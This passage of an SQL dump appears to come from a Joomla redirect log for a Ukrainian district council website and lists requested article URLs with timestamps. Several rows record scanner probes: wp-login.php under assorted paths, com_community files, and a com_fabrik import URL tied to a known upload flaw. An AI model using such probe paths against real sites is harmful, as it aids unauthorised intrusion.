00:00:00',301),(11493,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',6,0,'2014-12-02 02:49:36','0000-00-00 00:00:00',301),(11494,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1026:2013-06-14-05-02-34&catid=51&Itemid=92&lang=uk','','','',1,0,'2014-12-02 03:38:05','0000-00-00 00:00:00',301),(11495,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=uk','','','',1,0,'2014-12-02 03:38:40','0000-00-00 00:00:00',301),(11496,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=uk','','','',1,0,'2014-12-02 03:39:30','0000-00-00 00:00:00',301),(11497,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1048:2013-07-10-05-53-06&catid=51&Itemid=92&lang=uk','','','',1,0,'2014-12-02 03:41:16','0000-00-00 00:00:00',301),(11498,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&catid=52:--16082013-&Itemid=93&lang=en','','','',1,0,'2014-12-02 03:44:15','0000-00-00 00:00:00',301),(11499,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&catid=52:--16082013-&Itemid=93&lang=ru','','','',1,0,'2014-12-02 03:44:34','0000-00-00 00:00:00',301),(11500,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-12-02 03:48:32','0000-00-00 00:00:00',301),(11501,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1117:--------l-r----&catid=53:--25102013-&Itemid=94&lang=en','','','',1,0,'2014-12-02 03:48:55','0000-00-00 00:00:00',301),(11502,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1117:--------l-r----&catid=53:--25102013-&Itemid=94&lang=ru','','','',1,0,'2014-12-02 03:49:08','0000-00-00 00:00:00',301),(11503,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1117:--------l-r----&catid=53:--25102013-&Itemid=94&lang=uk','','','',1,0,'2014-12-02 03:49:15','0000-00-00 00:00:00',301),(11504,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',1,0,'2014-12-02 03:53:27','0000-00-00 00:00:00',301),(11505,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:-lr&catid=54:--29112013-&Itemid=95&lang=uk','','','',1,0,'2014-12-02 03:54:16','0000-00-00 00:00:00',301),(11506,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1152:2013-11-28-14-58-05&catid=54:--29112013-&Itemid=95&lang=ru','','','',1,0,'2014-12-02 03:56:34','0000-00-00 00:00:00',301),(11507,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1152:2013-11-28-14-58-05&catid=54:--29112013-&Itemid=95&lang=uk','','','',1,0,'2014-12-02 03:56:53','0000-00-00 00:00:00',301),(11508,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-2013-&catid=54:--29112013-&Itemid=95&lang=ru','','','',7,0,'2014-12-02 03:57:18','0000-00-00 00:00:00',301),(11509,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1168:2014-01-08-07-14-14&catid=55:--26122013-&Itemid=96&lang=uk','','','',1,0,'2014-12-02 04:02:36','0000-00-00 00:00:00',301),(11510,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1169:2014-01-08-07-30-47&catid=55:--26122013-&Itemid=96&lang=ru','','','',1,0,'2014-12-02 04:02:54','0000-00-00 00:00:00',301),(11511,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1169:2014-01-08-07-30-47&catid=55:--26122013-&Itemid=96&lang=uk','','','',1,0,'2014-12-02 04:03:05','0000-00-00 00:00:00',301),(11512,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&lang=uk','','','',1,0,'2014-12-02 04:03:44','0000-00-00 00:00:00',301),(11513,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&lang=uk','','','',1,0,'2014-12-02 04:03:57','0000-00-00 00:00:00',301),(11514,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11&lang=uk','','','',1,0,'2014-12-02 04:04:03','0000-00-00 00:00:00',301),(11515,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&lang=uk','','','',1,0,'2014-12-02 04:04:14','0000-00-00 00:00:00',301),(11516,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15&lang=uk','','','',1,0,'2014-12-02 04:05:26','0000-00-00 00:00:00',301),(11517,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:--------lr&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-12-02 04:19:22','0000-00-00 00:00:00',301),(11518,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&catid=49:--12042013-&Itemid=88&lang=en','','','',1,0,'2014-12-02 04:33:52','0000-00-00 00:00:00',301),(11519,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:-2011-2015-&catid=51:--19072013-&Itemid=92&lang=ru','','','',1,0,'2014-12-02 04:43:17','0000-00-00 00:00:00',301),(11520,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1048:2013-07-10-05-53-06&catid=51:--19072013-&Itemid=92&lang=uk','','','',1,0,'2014-12-02 04:44:21','0000-00-00 00:00:00',301),(11521,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:--------lr&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-12-02 04:49:47','0000-00-00 00:00:00',301),(11522,'http://www.malyn-rayrada.org.ua/index.php/922-do-vidoma-deputativ-rajonnoji-radi-informatsiya-shchodo-provedennya-postijnikh-komisij','','','',26,0,'2014-12-02 06:50:41','0000-00-00 00:00:00',301),(11523,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=997:-27-&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-12-02 07:55:45','0000-00-00 00:00:00',301),(11524,'http://malyn-rayrada.org.ua/pt/components/com_community/index.html','','','',1,0,'2014-12-02 08:39:12','0000-00-00 00:00:00',301),(11525,'http://malyn-rayrada.org.ua/pt/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-12-02 08:39:15','0000-00-00 00:00:00',301),(11526,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-12-02 11:28:47','0000-00-00 00:00:00',301),(11527,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-12-02 11:29:08','0000-00-00 00:00:00',301),(11528,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-12-02 11:29:35','0000-00-00 00:00:00',301),(11529,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=27:2010-06-07-11-05-24&catid=21&Itemid=47&lang=en','','','',1,0,'2014-12-02 11:29:44','0000-00-00 00:00:00',301),(11530,'http://malyn-rayrada.org.ua/wordpress/wp-login.php','','','',13,0,'2014-12-02 11:58:29','0000-00-00 00:00:00',301),(11531,'http://malyn-rayrada.org.ua/site/wp-login.php','','','',10,0,'2014-12-02 11:58:31','0000-00-00 00:00:00',301),(11532,'http://malyn-rayrada.org.ua/blog/wp-login.php','','','',15,0,'2014-12-02 11:58:34','0000-00-00 00:00:00',301),(11533,'http://malyn-rayrada.org.ua/wp/wp-login.php','','','',13,0,'2014-12-02 11:58:36','0000-00-00 00:00:00',301),(11534,'http://malyn-rayrada.org.ua/wp-login/','','','',10,0,'2014-12-02 11:58:40','0000-00-00 00:00:00',301),(11535,'http://www.malyn-rayrada.org.ua/wordpress/wp-login.php','','','',7,0,'2014-12-02 11:59:12','0000-00-00 00:00:00',301),(11536,'http://www.malyn-rayrada.org.ua/site/wp-login.php','','','',6,0,'2014-12-02 11:59:15','0000-00-00 00:00:00',301),(11537,'http://www.malyn-rayrada.org.ua/blog/wp-login.php','','','',7,0,'2014-12-02 11:59:17','0000-00-00 00:00:00',301),(11538,'http://www.malyn-rayrada.org.ua/wp/wp-login.php','','','',7,0,'2014-12-02 11:59:20','0000-00-00 00:00:00',301),(11539,'http://www.malyn-rayrada.org.ua/wp-login/','','','',6,0,'2014-12-02 11:59:27','0000-00-00 00:00:00',301),(11540,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1205:2014-01-31-07-53-03&lang=uk&option=com_content&view=article','','http://go.mail.ru/search?gp=openpart1&q=%D0%B5%D1%82%D0%B8%D0%BA%D0%B0+%D0%B4%D0%B5%D0%BF%D1%83%D1%82%D0%B0%D1%82%D1%96%D0%B2+%D1%80%D0%B0%D0%B9%D0%BE','',1,0,'2014-12-02 12:27:57','0000-00-00 00:00:00',301),(11541,'http://www.malyn-rayrada.org.ua/jupgrade/components/com_community/index.html','','','',1,0,'2014-12-02 14:09:31','0000-00-00 00:00:00',301),(11542,'http://www.malyn-rayrada.org.ua/jupgrade/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-12-02 14:09:34','0000-00-00 00:00:00',301),(11543,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-12-02 18:17:54','0000-00-00 00:00:00',301),(11544,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-12-02 22:26:23','0000-00-00 00:00:00',301),(11545,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-12-02 22:26:26','0000-00-00 00:00:00',301),(11546,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-12-02 22:26:52','0000-00-00 00:00:00',301),(11547,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-12-02 22:27:09','0000-00-00 00:00:00',301),(11548,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-12-02 22:27:46','0000-00-00 00:00:00',301),(11549,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-12-02 22:27:49','0000-00-00 00:00:00',301),(11550,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-12-02 22:28:27','0000-00-00 00:00:00',301),(11551,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-12-02 22:29:22','0000-00-00 00:00:00',301),(11552,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-12-02 22:29:59','0000-00-00 00:00:00',301),(11553,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-12-02 22:31:21','0000-00-00 00:00:00',301),(11554,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-12-02 22:31:30','0000-00-00 00:00:00',301),(11555,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',2,0,'2014-12-02 22:31:37','0000-00-00 00:00:00',301),(11556,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-12-02 22:32:51','0000-00-00 00:00:00',301),(11557,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-12-02 22:33:21','0000-00-00 00:00:00',301),(11558,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-12-02 22:36:23','0000-00-00 00:00:00',301),(11559,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-12-02 22:36:57','0000-00-00 00:00:00',301),(11560,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=en','','','',2,0,'2014-12-02 22:37:06','0000-00-00 00:00:00',301),(11561,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=ru','','','',2,0,'2014-12-02 22:37:09','0000-00-00 00:00:00',301),(11562,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=en','','','',2,0,'2014-12-02 22:37:28','0000-00-00 00:00:00',301),(11563,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=ru','','','',2,0,'2014-12-02 22:37:31','0000-00-00 00:00:00',301),(11564,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=ru','','','',2,0,'2014-12-02 22:37:37','0000-00-00 00:00:00',301),(11565,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=en','','','',2,0,'2014-12-02 22:37:40','0000-00-00 00:00:00',301),(11566,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=ru','','','',2,0,'2014-12-02 22:37:43','0000-00-00 00:00:00',301),(11567,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=en','','','',2,0,'2014-12-02 22:37:46','0000-00-00 00:00:00',301),(11568,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=ru','','','',2,0,'2014-12-02 22:37:49','0000-00-00 00:00:00',301),(11569,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-12-02 22:37:53','0000-00-00 00:00:00',301),(11570,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-12-02 22:38:14','0000-00-00 00:00:00',301),(11571,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-12-02 22:38:24','0000-00-00 00:00:00',301),(11572,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-12-02 22:38:35','0000-00-00 00:00:00',301),(11573,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-12-02 22:38:39','0000-00-00 00:00:00',301),(11574,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-12-02 22:38:45','0000-00-00 00:00:00',301),(11575,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-2012-2015-&catid=56&Itemid=97&lang=en','','','',2,0,'2014-12-02 22:39:08','0000-00-00 00:00:00',301),(11576,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-2012-2015-&catid=56&Itemid=97&lang=ru','','','',2,0,'2014-12-02 22:39:11','0000-00-00 00:00:00',301),(11577,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-12-02 22:39:14','0000-00-00 00:00:00',301),(11578,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=ru','','','',2,0,'2014-12-02 23:00:15','0000-00-00 00:00:00',301),(11579,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&lang=en','','','',2,0,'2014-12-02 23:00:31','0000-00-00 00:00:00',301),(11580,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=en','','','',2,0,'2014-12-02 23:00:44','0000-00-00 00:00:00',301),(11581,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=en','','','',2,0,'2014-12-02 23:01:12','0000-00-00 00:00:00',301),(11582,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=ru','','','',2,0,'2014-12-02 23:01:29','0000-00-00 00:00:00',301),(11583,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=968:-2012-&catid=11&lang=en','','','',2,0,'2014-12-02 23:01:39','0000-00-00 00:00:00',301),(11584,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=968:-2012-&catid=11&lang=ru','','','',2,0,'2014-12-02 23:01:47','0000-00-00 00:00:00',301),(11585,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=ru','','','',2,0,'2014-12-02 23:02:24','0000-00-00 00:00:00',301),(11586,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=en','','','',2,0,'2014-12-02 23:02:41','0000-00-00 00:00:00',301),(11587,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=ru','','','',2,0,'2014-12-02 23:02:44','0000-00-00 00:00:00',301),(11588,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1222:2014-02-22-10-52-44&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-03 02:18:17','0000-00-00 00:00:00',301),(11589,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1079:-l-2011-2013-r&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-03 02:18:31','0000-00-00 00:00:00',301),(11590,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1365:2014-07-10-13-58-58&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-03 02:19:32','0000-00-00 00:00:00',301),(11591,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1090:-l-r-&lang=en&option=com_content&view=article','','','',1,0,'2014-12-03 02:19:36','0000-00-00 00:00:00',301),(11592,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1150:2013-11-28-14-53-17&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-03 03:52:24','0000-00-00 00:00:00',301),(11593,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=1068:-22-&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-03 03:52:26','0000-00-00 00:00:00',301),(11594,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=957:199-&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-03 03:52:40','0000-00-00 00:00:00',301),(11595,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1189:2014-01-28-09-46-45&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-03 05:26:35','0000-00-00 00:00:00',301),(11596,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=926:2013-02-21-09-02-30&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-03 05:28:08','0000-00-00 00:00:00',301),(11597,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1340:------l---28r&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-03 07:01:04','0000-00-00 00:00:00',301),(11598,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=991:2013-04-22-08-24-54&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-03 08:35:20','0000-00-00 00:00:00',301),(11599,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1026:2013-06-14-05-02-34&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-03 08:36:39','0000-00-00 00:00:00',301),(11600,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1145:2013-11-27-09-47-11&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-03 08:36:41','0000-00-00 00:00:00',301),(11601,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1341:-14052014-&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-03 10:09:44','0000-00-00 00:00:00',301),(11602,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1114:-lr-&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-03 10:09:52','0000-00-00 00:00:00',301),(11603,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1072:-24-6-&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-03 10:11:06','0000-00-00 00:00:00',301),(11604,'http://www.malyn-rayrada.org.ua/index.php?Itemid=96&catid=55&id=1167:--------l-r-------&lang=ru&option=com_content&view=article','','','',3,0,'2014-12-03 10:11:08','0000-00-00 00:00:00',301),(11605,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-12-03 13:05:59','0000-00-00 00:00:00',301),(11606,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-03 13:06:04','0000-00-00 00:00:00',301),(11607,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 13:06:06','0000-00-00 00:00:00',301),(11608,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=ru&Itemid=0','','','',1,0,'2014-12-03 13:06:18','0000-00-00 00:00:00',301),(11609,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=uk&Itemid=0','','','',1,0,'2014-12-03 13:06:20','0000-00-00 00:00:00',301),(11610,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-12-03 13:06:35','0000-00-00 00:00:00',301),(11611,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-03 13:06:42','0000-00-00 00:00:00',301),(11612,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 13:06:45','0000-00-00 00:00:00',301),(11613,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-12-03 13:06:47','0000-00-00 00:00:00',301),(11614,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 13:07:13','0000-00-00 00:00:00',301),(11615,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-03 13:07:16','0000-00-00 00:00:00',301),(11616,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 13:07:18','0000-00-00 00:00:00',301),(11617,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-03 13:07:20','0000-00-00 00:00:00',301),(11618,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 13:07:23','0000-00-00 00:00:00',301),(11619,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-03 13:07:25','0000-00-00 00:00:00',301),(11620,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 13:07:28','0000-00-00 00:00:00',301),(11621,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1324:2014-05-27-13-24-07&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-03 13:18:25','0000-00-00 00:00:00',301),(11622,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1198:2014-01-31-07-37-58&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-03 13:18:27','0000-00-00 00:00:00',301),(11623,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1371:2014-08-04-19-11-42&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-03 14:53:03','0000-00-00 00:00:00',301),(11624,'http://www.malyn-rayrada.org.ua/index.php?Itemid=64&catid=32:2011-03-31-12-03-04&id=853:2012-12-11-13-39-46&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-03 14:53:11','0000-00-00 00:00:00',301),(11625,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1269:----3110&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-03 14:53:15','0000-00-00 00:00:00',301),(11626,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1267:2014-04-03-21-52-50&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-03 16:27:08','0000-00-00 00:00:00',301),(11627,'http://www.malyn-rayrada.org.ua/index.php?Itemid=32&id=2&lang=en&option=com_phocagallery&view=category','','','',1,0,'2014-12-03 16:28:19','0000-00-00 00:00:00',301),(11628,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 17:16:34','0000-00-00 00:00:00',301),(11629,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-12-03 17:17:16','0000-00-00 00:00:00',301),(11630,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 17:18:25','0000-00-00 00:00:00',301),(11631,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1283:2014-04-15-16-30-00&lang=en&option=com_content&view=article','','','',2,0,'2014-12-03 18:01:32','0000-00-00 00:00:00',301),(11632,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 18:03:05','0000-00-00 00:00:00',301),(11633,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-03 18:03:26','0000-00-00 00:00:00',301),(11634,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-03 18:03:32','0000-00-00 